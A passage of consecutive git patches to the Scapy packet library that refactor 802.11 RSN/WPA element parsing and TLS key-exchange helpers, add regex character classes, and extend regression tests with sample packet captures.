AKMSuite(suite="802.1X")]))).nb_akm_suites == 2 ############ ############ From b89c674ae3b418aa5647372f5032439fc949a0de Mon Sep 17 00:00:00 2001 From: Gabriel Date: Thu, 25 Jun 2020 10:35:08 +0200 Subject: [PATCH 0209/1632] Don't check conf.debug_dissector in sslv2 --- scapy/layers/tls/handshake_sslv2.py | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/scapy/layers/tls/handshake_sslv2.py b/scapy/layers/tls/handshake_sslv2.py index f83d7310f13..68b7f470349 100644 --- a/scapy/layers/tls/handshake_sslv2.py +++ b/scapy/layers/tls/handshake_sslv2.py @@ -8,7 +8,6 @@ import struct -from scapy.config import conf from scapy.error import log_runtime, warning from scapy.utils import randstring from scapy.fields import ByteEnumField, ByteField, EnumField, FieldLenField, \ @@ -142,8 +141,8 @@ def getfield(self, pkt, s): try: certdata = Cert(s[:tmp_len]) except Exception: - if conf.debug_dissector: - raise + # Packets are sometimes wrongly interpreted as SSLv2 + # (see record.py). We ignore failures silently certdata = s[:tmp_len] return s[tmp_len:], certdata From 5d737675f3e03ac158f8c9805cedf2e3396c7379 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 18 Jun 2020 21:14:28 +0200 Subject: [PATCH 0210/1632] Cleanup 802.11 RSN and MicrosoftWPA --- scapy/layers/dot11.py | 155 +++++++++++++++++++++++------------------- test/regression.uts | 15 ++++ 2 files changed, 101 insertions(+), 69 deletions(-) diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index 89e9f48971d..88fd30a822c 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -30,13 +30,35 @@ DLT_IEEE802_11_RADIO from scapy.compat import raw, plain_str, orb, chb from scapy.packet import Packet, bind_layers, bind_top_down, NoPayload -from scapy.fields import ByteField, LEShortField, BitField, LEShortEnumField, \ - ByteEnumField, X3BytesField, FlagsField, LELongField, StrField, \ - StrLenField, IntField, XByteField, LEIntField, StrFixedLenField, \ - LESignedIntField, ReversePadField, ConditionalField, PacketListField, \ - ShortField, BitEnumField, FieldLenField, LEFieldLenField, \ - FieldListField, XStrFixedLenField, PacketField, FCSField, \ - ScalingField +from scapy.fields import ( + BitEnumField, + BitField, + ByteEnumField, + ByteField, + ConditionalField, + FCSField, + FieldLenField, + FieldListField, + FlagsField, + IntField, + LEFieldLenField, + LEIntField, + LELongField, + LEShortEnumField, + LEShortField, + LESignedIntField, + PacketField, + PacketListField, + ReversePadField, + ScalingField, + ShortField, + StrField, + StrFixedLenField, + StrLenField, + X3BytesField, + XByteField, + XStrFixedLenField, +) from scapy.ansmachine import AnsweringMachine from scapy.plist import PacketList from scapy.layers.l2 import Ether, LLC, MACField @@ -655,8 +677,7 @@ def network_stats(self): else: crypto.add(wpa_version) elif p.ID == 221: - if isinstance(p, Dot11EltMicrosoftWPA) or \ - p.info.startswith(b'\x00P\xf2\x01\x01\x00'): + if isinstance(p, Dot11EltMicrosoftWPA): if p.akm_suites: auth = p.akm_suites[0].sprintf("%suite%") crypto.add("WPA/%s" % auth) @@ -704,7 +725,7 @@ class Dot11Beacon(_Dot11EltUtils): 107: "Interworking", 127: "ExtendendCapatibilities", 191: "VHTCapabilities", - 221: "vendor" + 221: "Vendor" } @@ -730,28 +751,18 @@ def mysummary(self): @classmethod def register_variant(cls): - cls.registered_ies[cls.ID.default] = cls + if cls.ID.default not in cls.registered_ies: + cls.registered_ies[cls.ID.default] = cls @classmethod def dispatch_hook(cls, _pkt=None, *args, **kargs): if _pkt: - _id = orb(_pkt[0]) - if _id == 221: - oui_a = orb(_pkt[2]) - oui_b = orb(_pkt[3]) - oui_c = orb(_pkt[4]) - if oui_a == 0x00 and oui_b == 0x50 and oui_c == 0xf2: - # MS OUI - type_ = orb(_pkt[5]) - if type_ == 0x01: - # MS WPA IE - return Dot11EltMicrosoftWPA - else: - return Dot11EltVendorSpecific - else: - return Dot11EltVendorSpecific - else: - return cls.registered_ies.get(_id, cls) + _id = ord(_pkt[:1]) + idcls = cls.registered_ies.get(_id, cls) + if idcls.dispatch_hook != cls.dispatch_hook: + # Vendor has its own dispatch_hook + return idcls.dispatch_hook(_pkt=_pkt, *args, **kargs) + cls = idcls return cls def pre_dissect(self, s): @@ -847,7 +858,7 @@ class Dot11EltRSN(Dot11Elt): name = "802.11 RSN information" match_subclass = True fields_desc = [ - ByteField("ID", 48), + ByteEnumField("ID", 48, _dot11_info_elts_ids), ByteField("len", None), LEShortField("version", 1), PacketField("group_cipher_suite", RSNCipherSuite(), RSNCipherSuite), @@ -884,8 +895,17 @@ class Dot11EltRSN(Dot11Elt): PacketField("pmkids", None, PMKIDListPacket), lambda pkt: ( 0 if pkt.len is None else - pkt.len - (12 + (pkt.nb_pairwise_cipher_suites * 4) + - (pkt.nb_akm_suites * 4)) >= 18) + pkt.len - ( + 12 + + pkt.nb_pairwise_cipher_suites * 4 + + pkt.nb_akm_suites * 4 + ) >= 2 + ) + ), + ConditionalField( + PacketField("group_management_cipher_suite", + RSNCipherSuite(cipher=0x6), RSNCipherSuite), + lambda pkt: pkt.mfp_capable == 1 ) ] @@ -906,7 +926,7 @@ class Dot11EltCountry(Dot11Elt): name = "802.11 Country" match_subclass = True fields_desc = [ - ByteField("ID", 7), + ByteEnumField("ID", 7, _dot11_info_elts_ids), ByteField("len", None), StrFixedLenField("country_string", b"\0\0\0", length=3), PacketListField( @@ -924,46 +944,11 @@ class Dot11EltCountry(Dot11Elt): ] -class Dot11EltMicrosoftWPA(Dot11Elt): - name = "802.11 Microsoft WPA" - match_subclass = True - fields_desc = [ - ByteField("ID", 221), - ByteField("len", None), - X3BytesField("oui", 0x0050f2), - XByteField("type", 0x01), - LEShortField("version", 1), - PacketField("group_cipher_suite", RSNCipherSuite(), RSNCipherSuite), - LEFieldLenField( - "nb_pairwise_cipher_suites", - None, - count_of="pairwise_cipher_suites" - ), - PacketListField( - "pairwise_cipher_suites", - RSNCipherSuite(), - RSNCipherSuite, - count_from=lambda p: p.nb_pairwise_cipher_suites - ), - LEFieldLenField( - "nb_akm_suites", - None, - count_of="akm_suites" - ), - PacketListField( - "akm_suites", - AKMSuite(), - AKMSuite, - count_from=lambda p: p.nb_akm_suites - ) - ] - - class Dot11EltRates(Dot11Elt): name = "802.11 Rates" match_subclass = True fields_desc = [ - ByteField("ID", 1), + ByteEnumField("ID", 1, _dot11_info_elts_ids), ByteField("len", None), FieldListField( "rates", @@ -978,12 +963,44 @@ class Dot11EltVendorSpecific(Dot11Elt): name = "802.11 Vendor Specific" match_subclass = True fields_desc = [ - ByteField("ID", 221), + ByteEnumField("ID", 221, _dot11_info_elts_ids), ByteField("len", None), X3BytesField("oui", 0x000000), StrLenField("info", "", length_from=lambda x: x.len - 3) ] + @classmethod + def dispatch_hook(cls, _pkt=None, *args, **kargs): + if _pkt: + oui = struct.unpack("!I", b"\x00" + _pkt[2:5])[0] + if oui == 0x0050f2: # Microsoft + type_ = orb(_pkt[5]) + if type_ == 0x01: + # MS WPA IE + return Dot11EltMicrosoftWPA + elif type_ == 0x02: + # MS WME IE TODO + # return Dot11EltMicrosoftWME + pass + elif type_ == 0x04: + # MS WPS IE TODO + # return Dot11EltWPS + pass + return Dot11EltVendorSpecific + return cls + + +class Dot11EltMicrosoftWPA(Dot11EltVendorSpecific): + name = "802.11 Microsoft WPA" + match_subclass = True + ID = 221 + # It appears many WPA implementations ignore the fact + # that this IE should only have a single cipher and auth suite + fields_desc = Dot11EltRSN.fields_desc[:2] + [ + X3BytesField("oui", 0x0050f2), + XByteField("type", 0x01) + ] + Dot11EltRSN.fields_desc[2:8] + class Dot11ATIM(Packet): name = "802.11 ATIM" diff --git a/test/regression.uts b/test/regression.uts index f29009f1fa7..a11d5bfda72 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -12217,6 +12217,21 @@ assert rsn_ie.akm_suites[0].suite == 0x01 assert rsn_ie.pre_auth assert Dot11Elt in rsn_ie +pkt = RadioTap(b"\x00\x000\x00/@\x00\xa0 \x08\x00\xa0 \x08\x00\xa0 \x08\x00\x00\x00\x00\x00\x00\x0bpin;%\xedN\x10\x0cl\t\xc0\x00\xce\x00\x00\x00\xb2\x00\xbd\x01\xce\x02\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff\xec\x17/\x82\x1e)\xec\x17/\x82\x1e)\x10p\x81a\xa1\x08\x00\x00\x00\x00d\x001\x04\x00\rROUTE-821E295\x01\x01\x8c\x03\x01\x01\x05\x04\x00\x02\x00\x00\x07$IL \x01\x01\x14\x02\x01\x14\x03\x01\x14\x04\x01\x14\x05\x01\x14\x06\x01\x14\x07\x01\x14\x08\x01\x14\t\x01\x14\n\x01\x14\x0b\x01\x14;\x12QQRSTstuvwxyz{}~\x7f\x80*\x01\x000\x1a\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x02\x8c\x00\x00\x00\x00\x0f\xac\x06-\x1a\x8d\x01\x1f\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00=\x16\x01\x00\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdd\x18\x00P\xf2\x02\x01\x01\x81\x00\x03\xa4\x00\x00'\xa4\x00\x00BT^\x00a2/\x00\x7f\x01\x04\xdd\x07\x00\xa0\xc6\x02\x02\x03\x00\xdd\x17\xec\x17/RRRRRRRRRRRRRRRRRRRRR\x9e[\xf2") +assert Dot11EltRSN in pkt +assert pkt[Dot11Beacon].network_stats() == { + 'ssid': 'ROUTE-821E295', + 'rates': [140], + 'channel': 1, + 'country': 'IL', + 'country_desc_type': None, + 'crypto': {'WPA2/PSK'} +} +assert [x.ID for x in pkt[Dot11Elt].iterpayloads()] == [0, 1, 3, 5, 7, 59, 42, 48, 45, 61, 221, 127, 221, 221] +assert pkt.pmkids.nb_pmkids == 0 +assert pkt.group_management_cipher_suite.oui == 0xfac +assert pkt.group_management_cipher_suite.cipher == 0x6 + = Dot11EltMicrosoftWPA assert bytes(Dot11EltMicrosoftWPA()) == b'\xdd\x16\x00P\xf2\x01\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x01' ms_wpa_ie = Dot11EltMicrosoftWPA(b'\xdd\x1a\x00P\xf2\x01\x01\x00\x00P\xf2\x02\x02\x00\x00P\xf2\x04\x00P\xf2\x02\x01\x00\x00P\xf2\x01') From 7af9e6ca4ecb5b5b93ab9bbe0c53516bfc1d9253 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 7 Jul 2020 07:56:24 +0000 Subject: [PATCH 0211/1632] Re-use cryptography code --- scapy/layers/tls/crypto/groups.py | 79 +++++++++++++++++++++++ scapy/layers/tls/keyexchange.py | 93 ++++++++++----------------- scapy/layers/tls/keyexchange_tls13.py | 79 +++++------------------ test/tls.uts | 18 ++++++ 4 files changed, 147 insertions(+), 122 deletions(-) diff --git a/scapy/layers/tls/crypto/groups.py b/scapy/layers/tls/crypto/groups.py index 955e06ccdc9..e27be4cee4d 100644 --- a/scapy/layers/tls/crypto/groups.py +++ b/scapy/layers/tls/crypto/groups.py @@ -15,10 +15,16 @@ from __future__ import absolute_import from scapy.config import conf +from scapy.error import warning from scapy.utils import long_converter import scapy.modules.six as six if conf.crypto_valid: from cryptography.hazmat.backends import default_backend + from cryptography.hazmat.primitives.asymmetric import dh, ec + from cryptography.hazmat.primitives import serialization +if conf.crypto_valid_advanced: + from cryptography.hazmat.primitives.asymmetric import x25519 + from cryptography.hazmat.primitives.asymmetric import x448 # We have to start by a dirty hack in order to allow long generators, # which some versions of openssl love to use... @@ -435,6 +441,79 @@ class ffdhe8192(_FFDHParams): # From RFC 7919 _tls_named_groups.update(_tls_named_curves) +def _tls_named_groups_import(group, pubbytes): + if group in _tls_named_ffdh_groups: + params = _ffdh_groups[_tls_named_ffdh_groups[group]][0] + pn = params.parameter_numbers() + public_numbers = dh.DHPublicNumbers(pubbytes, pn) + return public_numbers.public_key(default_backend()) + elif group in _tls_named_curves: + if _tls_named_curves[group] in ["x25519", "x448"]: + if conf.crypto_valid_advanced: + if _tls_named_curves[group] == "x25519": + import_point = x25519.X25519PublicKey.from_public_bytes + else: + import_point = x448.X448PublicKey.from_public_bytes + return import_point(pubbytes) + else: + curve = ec._CURVE_TYPES[_tls_named_curves[group]]() + try: # cryptography >= 2.5 + return ec.EllipticCurvePublicKey.from_encoded_point( + curve, + pubbytes + ) + except AttributeError: + pub_num = ec.EllipticCurvePublicNumbers.from_encoded_point( + curve, + pubbytes + ).public_numbers() + return pub_num.public_key(default_backend()) + + +def _tls_named_groups_pubbytes(privkey): + if isinstance(privkey, dh.DHPrivateKey): + pubkey = privkey.public_key() + return pubkey.public_numbers().y + elif isinstance(privkey, (x25519.X25519PrivateKey, + x448.X448PrivateKey)): + pubkey = privkey.public_key() + return pubkey.public_bytes( + serialization.Encoding.Raw, + serialization.PublicFormat.Raw + ) + else: + pubkey = privkey.public_key() + try: + # cryptography >= 2.5 + return pubkey.public_bytes( + serialization.Encoding.X962, + serialization.PublicFormat.UncompressedPoint + ) + except TypeError: + # older versions + return pubkey.public_numbers().encode_point() + + +def _tls_named_groups_generate(group): + if group in _tls_named_ffdh_groups: + params = _ffdh_groups[_tls_named_ffdh_groups[group]][0] + return params.generate_private_key() + elif group in _tls_named_curves: + group_name = _tls_named_curves[group] + if group_name in ["x25519", "x448"]: + if conf.crypto_valid_advanced: + if group_name == "x25519": + return x25519.X25519PrivateKey.generate() + else: + return x448.X448PrivateKey.generate() + else: + warning( + "Your cryptography version doesn't support " + group_name + ) + else: + curve = ec._CURVE_TYPES[_tls_named_curves[group]]() + return ec.generate_private_key(curve, default_backend()) + # Below lies ghost code since the shift from 'ecdsa' to 'cryptography' lib. # Part of the code has been kept, but commented out, in case anyone would like # to improve ECC support in 'cryptography' (namely for the compressed point diff --git a/scapy/layers/tls/keyexchange.py b/scapy/layers/tls/keyexchange.py index 5172af43f16..222f68b0e1e 100644 --- a/scapy/layers/tls/keyexchange.py +++ b/scapy/layers/tls/keyexchange.py @@ -23,12 +23,17 @@ from scapy.layers.tls.session import _GenericTLSSessionInheritance from scapy.layers.tls.basefields import _tls_version, _TLSClientVersionField from scapy.layers.tls.crypto.pkcs1 import pkcs_i2osp, pkcs_os2ip -from scapy.layers.tls.crypto.groups import _ffdh_groups, _tls_named_curves -import scapy.modules.six as six +from scapy.layers.tls.crypto.groups import ( + _ffdh_groups, + _tls_named_curves, + _tls_named_groups_generate, + _tls_named_groups_import, + _tls_named_groups_pubbytes, +) + if conf.crypto_valid: from cryptography.hazmat.backends import default_backend - from cryptography.hazmat.primitives import serialization from cryptography.hazmat.primitives.asymmetric import dh, ec @@ -568,43 +573,25 @@ def fill_missing(self): self.curve_type = _tls_ec_curve_types["named_curve"] if self.named_curve is None: - curve = ec.SECP256R1() - s.server_kx_privkey = ec.generate_private_key(curve, - default_backend()) - self.named_curve = next((cid for cid, name in six.iteritems(_tls_named_curves) # noqa: E501 - if name == curve.name), 0) - else: - curve_name = _tls_named_curves.get(self.named_curve) - if curve_name is None: - # this fallback is arguable - curve = ec.SECP256R1() - else: - curve_cls = ec._CURVE_TYPES.get(curve_name) - if curve_cls is None: - # this fallback is arguable - curve = ec.SECP256R1() - else: - curve = curve_cls() - s.server_kx_privkey = ec.generate_private_key(curve, - default_backend()) + self.named_curve = 23 + + curve_group = self.named_curve + if curve_group not in _tls_named_curves: + # this fallback is arguable + curve_group = 23 # default to secp256r1 + s.server_kx_privkey = _tls_named_groups_generate(curve_group) if self.point is None: - pubkey = s.server_kx_privkey.public_key() - try: - # cryptography >= 2.5 - self.point = pubkey.public_bytes( - serialization.Encoding.X962, - serialization.PublicFormat.UncompressedPoint - ) - except TypeError: - # older versions - self.key_exchange = pubkey.public_numbers().encode_point() + self.point = _tls_named_groups_pubbytes( + s.server_kx_privkey + ) + # else, we assume that the user wrote the server_kx_privkey by himself if self.pointlen is None: self.pointlen = len(self.point) if not s.client_kx_ecdh_params: - s.client_kx_ecdh_params = curve + s.client_kx_ecdh_params = curve_group @crypto_validator def register_pubkey(self): @@ -616,19 +603,14 @@ def register_pubkey(self): # if self.point[0] in [b'\x02', b'\x03']: # point_format = 1 - curve_name = _tls_named_curves[self.named_curve] - curve = ec._CURVE_TYPES[curve_name]() s = self.tls_session - try: # cryptography >= 2.5 - import_point = ec.EllipticCurvePublicKey.from_encoded_point - s.server_kx_pubkey = import_point(curve, self.point) - except AttributeError: - import_point = ec.EllipticCurvePublicNumbers.from_encoded_point - pubnum = import_point(curve, self.point) - s.server_kx_pubkey = pubnum.public_key(default_backend()) + s.server_kx_pubkey = _tls_named_groups_import( + self.named_curve, + self.point + ) if not s.client_kx_ecdh_params: - s.client_kx_ecdh_params = curve + s.client_kx_ecdh_params = self.named_curve def post_dissection(self, r): try: @@ -753,8 +735,7 @@ class ClientDiffieHellmanPublic(_GenericTLSSessionInheritance): @crypto_validator def fill_missing(self): s = self.tls_session - params = s.client_kx_ffdh_params - s.client_kx_privkey = params.generate_private_key() + s.client_kx_privkey = s.client_kx_ffdh_params.generate_private_key() pubkey = s.client_kx_privkey.public_key() y = pubkey.public_numbers().y self.dh_Yc = pkcs_i2osp(y, pubkey.key_size // 8) @@ -811,15 +792,15 @@ class ClientECDiffieHellmanPublic(_GenericTLSSessionInheritance): @crypto_validator def fill_missing(self): s = self.tls_session - params = s.client_kx_ecdh_params - s.client_kx_privkey = ec.generate_private_key(params, - default_backend()) + s.client_kx_privkey = _tls_named_groups_generate( + s.client_kx_ecdh_params + ) pubkey = s.client_kx_privkey.public_key() x = pubkey.public_numbers().x y = pubkey.public_numbers().y self.ecdh_Yc = (b"\x04" + - pkcs_i2osp(x, params.key_size // 8) + - pkcs_i2osp(y, params.key_size // 8)) + pkcs_i2osp(x, pubkey.key_size // 8) + + pkcs_i2osp(y, pubkey.key_size // 8)) if s.client_kx_privkey and s.server_kx_pubkey: pms = s.client_kx_privkey.exchange(ec.ECDH(), s.server_kx_pubkey) @@ -841,14 +822,10 @@ def post_dissection(self, m): # if there are kx params and keys, we assume the crypto library is ok if s.client_kx_ecdh_params: - try: # cryptography >= 2.5 - import_point = ec.EllipticCurvePublicKey.from_encoded_point - s.client_kx_pubkey = import_point(s.client_kx_ecdh_params, - self.ecdh_Yc) - except AttributeError: - import_point = ec.EllipticCurvePublicNumbers.from_encoded_point - pub_num = import_point(s.client_kx_ecdh_params, self.ecdh_Yc) - s.client_kx_pubkey = pub_num.public_key(default_backend()) + s.client_kx_pubkey = _tls_named_groups_import( + s.client_kx_ecdh_params, + self.ecdh_Yc + ) if s.server_kx_privkey and s.client_kx_pubkey: ZZ = s.server_kx_privkey.exchange(ec.ECDH(), s.client_kx_pubkey) diff --git a/scapy/layers/tls/keyexchange_tls13.py b/scapy/layers/tls/keyexchange_tls13.py index 97b63465543..aed3634ed3d 100644 --- a/scapy/layers/tls/keyexchange_tls13.py +++ b/scapy/layers/tls/keyexchange_tls13.py @@ -16,18 +16,18 @@ StrLenField from scapy.packet import Packet, Padding from scapy.layers.tls.extensions import TLS_Ext_Unknown, _tls_ext -from scapy.layers.tls.crypto.groups import _tls_named_ffdh_groups, \ - _tls_named_curves, _ffdh_groups, \ - _tls_named_groups +from scapy.layers.tls.crypto.groups import ( + _tls_named_curves, + _tls_named_ffdh_groups, + _tls_named_groups, + _tls_named_groups_generate, + _tls_named_groups_import, + _tls_named_groups_pubbytes, +) import scapy.modules.six as six if conf.crypto_valid: - from cryptography.hazmat.backends import default_backend - from cryptography.hazmat.primitives import serialization - from cryptography.hazmat.primitives.asymmetric import dh, ec -if conf.crypto_valid_advanced: - from cryptography.hazmat.primitives.asymmetric import x25519 - from cryptography.hazmat.primitives.asymmetric import x448 + from cryptography.hazmat.primitives.asymmetric import ec class KeyShareEntry(Packet): @@ -62,39 +62,8 @@ def create_privkey(self): """ This is called by post_build() for key creation. """ - if self.group in _tls_named_ffdh_groups: - params = _ffdh_groups[_tls_named_ffdh_groups[self.group]][0] - privkey = params.generate_private_key() - self.privkey = privkey - pubkey = privkey.public_key() - self.key_exchange = pubkey.public_numbers().y - elif self.group in _tls_named_curves: - if _tls_named_curves[self.group] in ["x25519", "x448"]: - if conf.crypto_valid_advanced: - if _tls_named_curves[self.group] == "x25519": - privkey = x25519.X25519PrivateKey.generate() - else: - privkey = x448.X448PrivateKey.generate() - self.privkey = privkey - pubkey = privkey.public_key() - self.key_exchange = pubkey.public_bytes( - serialization.Encoding.Raw, - serialization.PublicFormat.Raw - ) - else: - curve = ec._CURVE_TYPES[_tls_named_curves[self.group]]() - privkey = ec.generate_private_key(curve, default_backend()) - self.privkey = privkey - pubkey = privkey.public_key() - try: - # cryptography >= 2.5 - self.key_exchange = pubkey.public_bytes( - serialization.Encoding.X962, - serialization.PublicFormat.UncompressedPoint - ) - except TypeError: - # older versions - self.key_exchange = pubkey.public_numbers().encode_point() + self.privkey = _tls_named_groups_generate(self.group) + self.key_exchange = _tls_named_groups_pubbytes(self.privkey) def post_build(self, pkt, pay): if self.group is None: @@ -115,28 +84,10 @@ def post_build(self, pkt, pay): @crypto_validator def register_pubkey(self): - if self.group in _tls_named_ffdh_groups: - params = _ffdh_groups[_tls_named_ffdh_groups[self.group]][0] - pn = params.parameter_numbers() - public_numbers = dh.DHPublicNumbers(self.key_exchange, pn) - self.pubkey = public_numbers.public_key(default_backend()) - elif self.group in _tls_named_curves: - if _tls_named_curves[self.group] in ["x25519", "x448"]: - if conf.crypto_valid_advanced: - if _tls_named_curves[self.group] == "x25519": - import_point = x25519.X25519PublicKey.from_public_bytes - else: - import_point = x448.X448PublicKey.from_public_bytes - self.pubkey = import_point(self.key_exchange) - else: - curve = ec._CURVE_TYPES[_tls_named_curves[self.group]]() - try: # cryptography >= 2.5 - import_point = ec.EllipticCurvePublicKey.from_encoded_point # noqa: E501 - self.pubkey = import_point(curve, self.key_exchange) - except AttributeError: - import_point = ec.EllipticCurvePublicNumbers.from_encoded_point # noqa: E501 - pub_num = import_point(curve, self.key_exchange).public_numbers() # noqa: E501 - self.pubkey = pub_num.public_key(default_backend()) + self.pubkey = _tls_named_groups_import( + self.group, + self.key_exchange + ) def post_dissection(self, r): try: diff --git a/test/tls.uts b/test/tls.uts index 7362700ecb9..6d5da7872c3 100644 --- a/test/tls.uts +++ b/test/tls.uts @@ -979,6 +979,10 @@ assert(rec_fin.mac == b'\xecguD\xa8\x87$<7+\n\x94\x1e9\x96\xfa') assert(isinstance(rec_fin.msg[0], _TLSEncryptedContent)) rec_fin.msg[0].load == b'7\\)`\xaa`\x7ff\xcd\x10\xa9v\xa3*\x17\x1a' +### +### Other/bug tests +### + = Reading TLS test session - Full TLSNewSessionTicket captured import os tmp = "/test/pcaps/tls_new-session-ticket.pcap" @@ -1012,6 +1016,20 @@ conf.debug_dissector = False assert isinstance(_TLSMsgListField.m2i(_TLSMsgListField("", []), TLS(type=20), 1), Raw) conf.debug_dissector = old_debug_dissector += Test x25519 dissection in ServerKeyExchange + +import binascii + +session = tlsSession(connection_end="client") +# Raw hex data of a TLS Handshake - Server Key Exchange with x25519 elliptic curve +hex_data = "160303012c0c00012803001d202f19b3f5defbd65cfdcbb3583d4760ef74dde4144e01049a43d8a036df38ca15080401008e4e4afc21f612d2f024bb489940a733ea606ed36cba9c60b8479264dcb5f4a0f839d85fa02f0a4be087243e69e575af48917ba6dfda9b485311cd8fe0d7616ece9b216b7b878588c03d3ab90b9dc981f758588905307541c7d3ccb6655baf7bfb0628f3a0ac181729da6b7fcba3efdd43f5bbaec53cfa4dd512941ee1204a42cba8a989e724bd42ac2cb1373ddb54acba29ae45fd58047176e4cb623a9b301711b926d15103f5251f6a0288b04a644834a9843752bbe2f8554beffdbf412983456fcc38b9caabdf7cf9ea2c30bd72dc00cf2cf48f22cd7f17b2d22fb651facb772507cc2fb83301c0c8dd1c3b4f24f38f0c4c82d21d0fa5d1e0b260d545e701" +packet = TLS(binascii.unhexlify(hex_data), tls_session=session) + +assert isinstance(packet.msg[0], TLSServerKeyExchange) +assert packet.msg[0].params[0].sprintf("%named_curve%") == "x25519" +assert packet.msg[0].params[0].point == b'/\x19\xb3\xf5\xde\xfb\xd6\\\xfd\xcb\xb3X=G`\xeft\xdd\xe4\x14N\x01\x04\x9aC\xd8\xa06\xdf8\xca\x15' + + ############################################################################### ####### Read handshake with TLS_ECDHE_ECDSA_WITH_NULL_SHA ##################### ############################################################################### From 835a5fc33ae6ced153d236bb2f4f9fa0094e7ce8 Mon Sep 17 00:00:00 2001 From: gpotter Date: Thu, 28 May 2020 14:22:08 +0200 Subject: [PATCH 0212/1632] Remove obsolete warnings --- scapy/asn1fields.py | 1 - scapy/fields.py | 2 +- scapy/layers/inet6.py | 2 +- scapy/route6.py | 3 --- 4 files changed, 2 insertions(+), 6 deletions(-) diff --git a/scapy/asn1fields.py b/scapy/asn1fields.py index d3fdd7d6d2d..87679b55077 100644 --- a/scapy/asn1fields.py +++ b/scapy/asn1fields.py @@ -545,7 +545,6 @@ def m2i(self, pkt, s): # we don't want to import ASN1_Packet in this module... return self.extract_packet(choice, s) elif isinstance(choice, type): - # XXX find a way not to instantiate the ASN1F_field return choice(self.name, b"").m2i(pkt, s) else: # XXX check properly if this is an ASN1F_PACKET diff --git a/scapy/fields.py b/scapy/fields.py index 35344353503..6b5299a66d1 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -1543,7 +1543,7 @@ def addfield(self, pkt, s, val): def getfield(self, pkt, s): len_str = s.find(b"\x00") if len_str < 0: - # XXX \x00 not found + # \x00 not found: return empty return b"", s return s[len_str + 1:], self.m2i(pkt, s[:len_str]) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index a10fb74fa86..b4279b8e8d6 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -269,7 +269,7 @@ def default_payload_class(self, p): class IPv6(_IPv6GuessPayload, Packet, IPTools): name = "IPv6" fields_desc = [BitField("version", 6, 4), - BitField("tc", 0, 8), # TODO: IPv6, ByteField ? + BitField("tc", 0, 8), BitField("fl", 0, 20), ShortField("plen", None), ByteEnumField("nh", 59, ipv6nh), diff --git a/scapy/route6.py b/scapy/route6.py index 1aa46d4ace9..939df4be7e8 100644 --- a/scapy/route6.py +++ b/scapy/route6.py @@ -71,7 +71,6 @@ def __repr__(self): # Unlike Scapy's Route.make_route() function, we do not have 'host' and 'net' # noqa: E501 # parameters. We only have a 'dst' parameter that accepts 'prefix' and # 'prefix/prefixlen' values. - # WARNING: Providing a specific device will at the moment not work correctly. # noqa: E501 def make_route(self, dst, gw=None, dev=None): """Internal function : create a route for 'dst' via 'gw'. """ @@ -83,8 +82,6 @@ def make_route(self, dst, gw=None, dev=None): if dev is None: dev, ifaddr, x = self.route(gw) else: - # TODO: do better than that - # replace that unique address by the list of all addresses lifaddr = in6_getifaddr() devaddrs = [x for x in lifaddr if x[2] == dev] ifaddr = construct_source_candidate_set(prefix, plen, devaddrs) From 8a8b2b3af2473a92b374d04fa4cf7baa8218ac41 Mon Sep 17 00:00:00 2001 From: gpotter Date: Thu, 28 May 2020 14:22:32 +0200 Subject: [PATCH 0213/1632] Support special regex in volatile --- scapy/volatile.py | 28 ++++++++++++++++++++++++---- test/regression.uts | 3 +++ 2 files changed, 27 insertions(+), 4 deletions(-) diff --git a/scapy/volatile.py b/scapy/volatile.py index 85c3aa13b5e..701f678bd47 100644 --- a/scapy/volatile.py +++ b/scapy/volatile.py @@ -513,8 +513,25 @@ def __init__(self, regexp, lambda_=0.3,): self._regexp = regexp self._lambda = lambda_ + special_sets = { + "[:alnum:]": "[a-zA-Z0-9]", + "[:alpha:]": "[a-zA-Z]", + "[:ascii:]": "[\x00-\x7F]", + "[:blank:]": "[ \t]", + "[:cntrl:]": "[\x00-\x1F\x7F]", + "[:digit:]": "[0-9]", + "[:graph:]": "[\x21-\x7E]", + "[:lower:]": "[a-z]", + "[:print:]": "[\x20-\x7E]", + "[:punct:]": "[!\"\\#$%&'()*+,\\-./:;<=>?@\\[\\\\\\]^_{|}~]", + "[:space:]": "[ \t\r\n\v\f]", + "[:upper:]": "[A-Z]", + "[:word:]": "[A-Za-z0-9_]", + "[:xdigit:]": "[A-Fa-f0-9]", + } + @staticmethod - def choice_expand(s): # XXX does not support special sets like (ex ':alnum:') # noqa: E501 + def choice_expand(s): m = "" invert = s and s[0] == "^" while True: @@ -580,10 +597,13 @@ def _fix(self): index = [] current = stack i = 0 - ln = len(self._regexp) + regexp = self._regexp + for k, v in self.special_sets.items(): + regexp = regexp.replace(k, v) + ln = len(regexp) interp = True while i < ln: - c = self._regexp[i] + c = regexp[i] i += 1 if c == '(': @@ -632,7 +652,7 @@ def _fix(self): current.append(e) interp = True elif c == '\\': - c = self._regexp[i] + c = regexp[i] if c == "s": c = RandChoice(" ", "\t") elif c in "0123456789": diff --git a/test/regression.uts b/test/regression.uts index a11d5bfda72..37dd70fb801 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -11521,6 +11521,9 @@ random.seed(0x2807) rex = RandRegExp("[g-v]* @? [0-9]{3} . (g|v)") bytes(rex) == ('vmuvr @ 906 \x9e g' if six.PY2 else b'irrtv @ 517 \xc2\xb8 v') +rex = RandRegExp("[:digit:][:space:][:word:]") +assert re.match(b"\\d\\s\\w", bytes(rex)) + = Corrupted(Bytes|Bits) random.seed(0x2807) From dae1eab3eba95a90a6c6ec46d1d6ff27de4eb4f3 Mon Sep 17 00:00:00 2001 From: gpotter Date: Thu, 28 May 2020 14:23:25 +0200 